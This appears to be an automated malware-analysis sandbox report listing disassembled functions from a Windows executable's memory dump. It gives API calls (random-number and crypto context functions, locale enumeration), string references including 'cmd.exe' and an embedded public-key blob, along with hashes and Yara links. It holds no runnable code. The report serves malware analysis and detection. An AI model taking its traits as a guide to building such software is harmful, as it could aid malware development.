MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 014556C4

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Wcsftime$_invalid_parameter_noinfo
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 4239037671-3729741635
Opcode ID: 6aa9ff3d35d0921247d50195d051c4655145b5e2e319f02f31d428be7c51e56d
Instruction ID: 4203f8523293bc93f5cb1f25bddb2b092069e017a5d4da324a813410eea7ee6e
Opcode Fuzzy Hash: 6aa9ff3d35d0921247d50195d051c4655145b5e2e319f02f31d428be7c51e56d
Instruction Fuzzy Hash: 7C71AF72600B5086EB60CF2AD48037D2764F798BA8F558627DF6E9B765DF38C051C300

Uniqueness

Uniqueness Score: -1.00%

Function 014089F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32 ref: 01408A7C
CryptReleaseContext.ADVAPI32 ref: 01408A97

Part of subcall function 01408330: GetLastError.KERNEL32 ref: 0140836F

Part of subcall function 01440748: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 0144078C
Part of subcall function 01440748: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 014407D2

Strings

CryptGenRandom, xrefs: 01408AE8

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Crypt$ContextErrorExceptionFileHeaderLastRaiseRandomRelease
String ID: CryptGenRandom
API String ID: 3931889421-3616286655
Opcode ID: a5356fc6b982be9e3f87e217f39e38e4c7f13cd79a43ea422aaa0d89ec47ba25
Instruction ID: f211c8b5dec91e95d2372beeb49a90b56e19a30454f077df1cd3af5d5687b827
Opcode Fuzzy Hash: a5356fc6b982be9e3f87e217f39e38e4c7f13cd79a43ea422aaa0d89ec47ba25
Instruction Fuzzy Hash: 0D318232314A9291EA61DB16E85079EA760F7D8BD4F845236DA9D83BB4DF38C546CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0145D4B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0145D4E9
GetLocaleInfoW.KERNEL32(?,?,?,?,?,01459B43), ref: 0145D517

Strings

GetLocaleInfoEx, xrefs: 0145D4DD

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: f29e1ce4d0232583006b6d28d0e1e7341a426e0c71835288dbceb42509b2573b
Instruction ID: ba2dff2ff19d17c74951d52a8fdc22bf1f074249685e339ae4a0bb45733394d7
Opcode Fuzzy Hash: f29e1ce4d0232583006b6d28d0e1e7341a426e0c71835288dbceb42509b2573b
Instruction Fuzzy Hash: D0F0C235B04B8082E700ABA6B4403CAB760FB98BD4F98402BDF4917B79CF38C5468780

Uniqueness

Uniqueness Score: -1.00%

Function 01456330, Relevance: 4.8, APIs: 3, Instructions: 317COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 01456396
memcpy_s.LIBCPMT ref: 014563C1

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
Instruction ID: dc25f46dac4e060af8db100959c5d6d5f5633773580b33031da90db470cda02a
Opcode Fuzzy Hash: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
Instruction Fuzzy Hash: 8CB1297271428987DB74CF1DE148A5EBB62F398788F86812ADF4A43725E73DE841CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0145F07C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0145F0E0

Strings

gfffffff, xrefs: 0145F37D

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: beda6cfc5bfca348f3213292f0555f7cff378f820cb62970de094d3b6008c622
Instruction ID: a9624dbc32eb0d17b227c298bbfd003ca9cd82dffc597e8aef51f58503a3d4fc
Opcode Fuzzy Hash: beda6cfc5bfca348f3213292f0555f7cff378f820cb62970de094d3b6008c622
Instruction Fuzzy Hash: 6E8166A77057C486DF52CB2AE4003AE7BA5E765BC4F098023DE4947766EA3DC50AC702

Uniqueness

Uniqueness Score: -1.00%

Function 0145F914, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0145F945

Part of subcall function 01451A5C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,01451A09), ref: 01451A65
Part of subcall function 01451A5C: GetCurrentProcess.KERNEL32(?,?,?,?,01451A09), ref: 01451A8A

Strings

-, xrefs: 0145FB20

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: -
API String ID: 4036615347-2547889144
Opcode ID: 70645b144931c76e160cc73f118fe06d91fdbb05d9981deaf9dd04311d9f371d
Instruction ID: 268180e18c644d25550d823e3bed0c0e207d77af5420792c8a1246c8c2a8db9e
Opcode Fuzzy Hash: 70645b144931c76e160cc73f118fe06d91fdbb05d9981deaf9dd04311d9f371d
Instruction Fuzzy Hash: 21712972304B8486DBA0DB2AA50076BB7A1F795BE4F444227DF9947BBADB3CC404C702

Uniqueness

Uniqueness Score: -1.00%

Function 013E4D00, Relevance: 3.2, APIs: 2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc302151d44c9ec53e6fe4894396b6b139697aa4f6f5505c341d58b46a42cf6
Instruction ID: 0b5ac846858184202aa126bf66daeed7cacd1140a4b57018ed46f8cd858f4870
Opcode Fuzzy Hash: 7cc302151d44c9ec53e6fe4894396b6b139697aa4f6f5505c341d58b46a42cf6
Instruction Fuzzy Hash: 55A1BA26B18B90C9EB00CFB9D4547AD37A2F75878CF408622DE5827F89DB79C25AC340

Uniqueness

Uniqueness Score: -1.00%

Function 01408900, Relevance: 3.1, APIs: 2, Instructions: 56encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32 ref: 01408975
_Init_thread_footer.LIBCMT ref: 014089DE

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ContextCryptInit_thread_footerRelease
String ID:
API String ID: 1427515656-0
Opcode ID: a4109119769c496b240b7ae7fa3ccd34f7a2d46966cba9d39179a2fe8e38ee29
Instruction ID: 932fb9139230b361f1d9882e0b85cb305400ac7c6eb3ae3b8f368f74214a846f
Opcode Fuzzy Hash: a4109119769c496b240b7ae7fa3ccd34f7a2d46966cba9d39179a2fe8e38ee29
Instruction Fuzzy Hash: A4118732711A9281EF15EF5BF9907993360BBA4794F98413ACA5D477B4DF38C481C702

Uniqueness

Uniqueness Score: -1.00%

Function 01451BDC, Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

cmd.exe, xrefs: 01451CB8
COMSPEC, xrefs: 01451BFF

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: COMSPEC$cmd.exe
API String ID: 0-2256226045
Opcode ID: b8a8ec99deb4cc18005db4433069cb834b9025794ec66b42dc5d32e5e241b68d
Instruction ID: 35b9a611127a632a691a0d2f06aa80e689df6d6d7b4a8b60deeed63fbc3da8b6
Opcode Fuzzy Hash: b8a8ec99deb4cc18005db4433069cb834b9025794ec66b42dc5d32e5e241b68d
Instruction Fuzzy Hash: D631AF36700B5189EB55DFB6A840BAD37A4BBA8B98F84412BDE0D67B29CF34C140C341

Uniqueness

Uniqueness Score: -1.00%

Function 014690E4, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0145CB68: GetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CB77
Part of subcall function 0145CB68: SetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CC15

EnumSystemLocalesW.KERNEL32(?,?,?,014698CF,?,00000000,00000092,?,?,00000000,?,01459969), ref: 01469182

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 425423c9073539f02dfb6e7212086705c729f7290a0c10359d63abbcf7ddec0e
Instruction ID: 29cdaec2f354452e43582584157c6f1acf6ee95d412ca751dba7014c2c273a07
Opcode Fuzzy Hash: 425423c9073539f02dfb6e7212086705c729f7290a0c10359d63abbcf7ddec0e
Instruction Fuzzy Hash: C6112673A14644CEEB158F2AD4807EA7B64F380FE8F54811AC625433E0DAB4C6D2C741

Uniqueness

Uniqueness Score: -1.00%

Function 014691B4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0145CB68: GetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CB77
Part of subcall function 0145CB68: SetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CC15

EnumSystemLocalesW.KERNEL32(?,?,?,0146988B,?,00000000,00000092,?,?,00000000,?,01459969), ref: 01469232

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1dc0a9d15b30c0486abfe930f6cb994c7d830e3a38b20150be7a7e6dbd319fbe
Instruction ID: 29a971bde21488bc32d68457d1c8b7fa2d238028cf9686afd264c34c86ab1dc7
Opcode Fuzzy Hash: 1dc0a9d15b30c0486abfe930f6cb994c7d830e3a38b20150be7a7e6dbd319fbe
Instruction Fuzzy Hash: 57017B72B042848ADB104F5AF4407DA77AAE750BACF448327C735073E4DBB884C1C702

Uniqueness

Uniqueness Score: -1.00%

Function 0145CEE0, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,0145D371,?,?,?,?,?,?,?,?,00000000,01468730), ref: 0145CF2F

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 26d59d1133f61adf33b67aed7c1f06552151743aa5e472f9c904a809020af0da
Instruction ID: ebd8f103d60b39aff8d6f6a3568b15366bb4ee66bee0eca43f918f45180198cb
Opcode Fuzzy Hash: 26d59d1133f61adf33b67aed7c1f06552151743aa5e472f9c904a809020af0da
Instruction Fuzzy Hash: 60F03C76300B4483EB04DB59F89079923A6F798BC0F54812ADA5987378DF38C5A1D700

Uniqueness

Uniqueness Score: -1.00%

Function 0144F2C4, Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 0144F45D

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: e609f9993503d708d295c22c9d032845bca0f418b98de7f9e3721618729ccc0c
Instruction ID: e11dd98bc7dbf3626aa5ab89fda4e59202545ae5505996255d01755bff079413
Opcode Fuzzy Hash: e609f9993503d708d295c22c9d032845bca0f418b98de7f9e3721618729ccc0c
Instruction Fuzzy Hash: 0A512826304B8587FB298E7EA0103AB6B52E7A1B88F442127DF815777ADB75C44FC702

Uniqueness

Uniqueness Score: -1.00%

Function 0144F548, Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

0, xrefs: 0144F6E1

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: e9d33caecbe63b45b5f7e9047a6116cd6ae9056d49a43a9866efb8997ed04e83
Instruction ID: 4f84a78397e2922af359b34be10255dd782f6b19e76472a5bf3190298715fad1
Opcode Fuzzy Hash: e9d33caecbe63b45b5f7e9047a6116cd6ae9056d49a43a9866efb8997ed04e83
Instruction Fuzzy Hash: 3B516A2230468547FB399F3E50003AB6B62E762B48F485517DE896B73ACB76C44FCB45

Uniqueness

Uniqueness Score: -1.00%

Function 013E4580, Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

X;C, xrefs: 013E45FB

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: X;C
API String ID: 0-1317624072
Opcode ID: 122d9292f47c67d1ae1775e9c2339f5a9901d1bf4940dd1b3dc6fe4a5560b0af
Instruction ID: af146a31aa20d3fff646fe8dada0addd3744195cde4b203f32b14d81fbd17700
Opcode Fuzzy Hash: 122d9292f47c67d1ae1775e9c2339f5a9901d1bf4940dd1b3dc6fe4a5560b0af
Instruction Fuzzy Hash: 15419D72215B9086EB218B66F80479AB7A4F79DBE8F454225DF8C47B98DFB8C145CB00

Uniqueness

Uniqueness Score: -1.00%

Function 014597B8, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
String ID:
API String ID: 3827717455-0
Opcode ID: 73feba9139c654daf0036fbb7c8e78b3135a4b67a68e6def2d945d6374b675ea
Instruction ID: 71936806bf1df8f5bd763c6ad96b9c7975040de7af17a8dc74c41d67cf44caa5
Opcode Fuzzy Hash: 73feba9139c654daf0036fbb7c8e78b3135a4b67a68e6def2d945d6374b675ea
Instruction Fuzzy Hash: A4B1CE66304781C5EBA5DF66D8107AF77A1F794B8CF848027DE8A87B6AEB38C545C700

Uniqueness

Uniqueness Score: -1.00%

Function 014094C0, Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87fcff3c69630de4493288d823b5efbbcabeb222c5ddddd91e60e692ecbc5de9
Instruction ID: fcb1727c1ad06bd0281cc37dcd1840f8023a5793d46567a99bcca71a6c978eea
Opcode Fuzzy Hash: 87fcff3c69630de4493288d823b5efbbcabeb222c5ddddd91e60e692ecbc5de9
Instruction Fuzzy Hash: D1919163A15BD185DF028F2EC1446ED6B20F785B98F559722CF9D277A6EB38C259C300

Uniqueness

Uniqueness Score: -1.00%

Function 0144F7B0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 960c7df8e411086e2782e9439634f31836ef72421b11996258868d9b9c76ccd5
Instruction ID: c2b53d36218b0ef950286a036c3cc2fe36447bb5aa2b73dbd437906047dc9115
Opcode Fuzzy Hash: 960c7df8e411086e2782e9439634f31836ef72421b11996258868d9b9c76ccd5
Instruction Fuzzy Hash: BA61F22A71066197FB29DE2E90007AB3B61EB54B48F84912B9F855B738CB35C44FC706

Uniqueness

Uniqueness Score: -1.00%

Function 01458928, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3f1264506dc35417bba31135d9ecde9a66c7022a2b3b9cbac65a04ce8cdb5deb
Instruction ID: d2895f427a01754c8e96d5ecbd223cc20477918553a76ba244594af43a36a8dc
Opcode Fuzzy Hash: 3f1264506dc35417bba31135d9ecde9a66c7022a2b3b9cbac65a04ce8cdb5deb
Instruction Fuzzy Hash: ED41D072310A5482EF54CF6AE924799B3A1B358FD4F499427DE4D87B29EF3CC0428300

Uniqueness

Uniqueness Score: -1.00%

Function 013E30E0, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691b92efca09ed07461b468d70a8f6a4df31e5521ed69559dbed0b92475516dc
Instruction ID: 8cd29207216358e145935950a61bdb1e4afd85e63de4c72070c4f35975153350
Opcode Fuzzy Hash: 691b92efca09ed07461b468d70a8f6a4df31e5521ed69559dbed0b92475516dc
Instruction Fuzzy Hash: 7E31E333714BD886DB148F6AE48028DBB95F7D5B98F485129DF8D47B98CBB9C448CB00

Uniqueness

Uniqueness Score: -1.00%

Function 014469C4, Relevance: 51.1, APIs: 3, Strings: 26, Instructions: 323COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01446E71
DName::operator+.LIBVCRUNTIME ref: 01446EA9
DName::operator+.LIBVCRUNTIME ref: 01446EE3

Strings

const, xrefs: 01446D30
int, xrefs: 01446A6F
unsigned , xrefs: 01446E2E
char32_t, xrefs: 01446C45
signed , xrefs: 01446E3E
__int64, xrefs: 01446BA2
void, xrefs: 01446C94
__int32, xrefs: 01446BAE
char8_t, xrefs: 01446C6C
float, xrefs: 01446A3F
volatile, xrefs: 01446D78
double, xrefs: 01446DEB
short, xrefs: 01446A78
<unknown>, xrefs: 01446C63
__int16, xrefs: 01446B71
char16_t, xrefs: 01446C54
long, xrefs: 01446A60
char, xrefs: 01446A87
__int8, xrefs: 01446B08
__w64 , xrefs: 01446B14
bool, xrefs: 01446BC0
UNKNOWN, xrefs: 01446C2D
wchar_t, xrefs: 01446C36
volatile, xrefs: 01446D4B
long , xrefs: 01446DD4
__int128, xrefs: 01446B96

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1201493255
Opcode ID: 86895adc3cb092ff0aa998b626a74d5efb425cc0007f50f421b847dd98f32726
Instruction ID: 12da38aca48707df2316fab5c3c9d87ea201a7b7c320a2e822264b82e14a0cb9
Opcode Fuzzy Hash: 86895adc3cb092ff0aa998b626a74d5efb425cc0007f50f421b847dd98f32726
Instruction Fuzzy Hash: C7E17BB2B10B159AFB20CBA9D8803ED37B1F716788F954517CA5997B78DB74C289C340

Uniqueness

Uniqueness Score: -1.00%

Function 0145D8DC, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON

Download Yara Rule

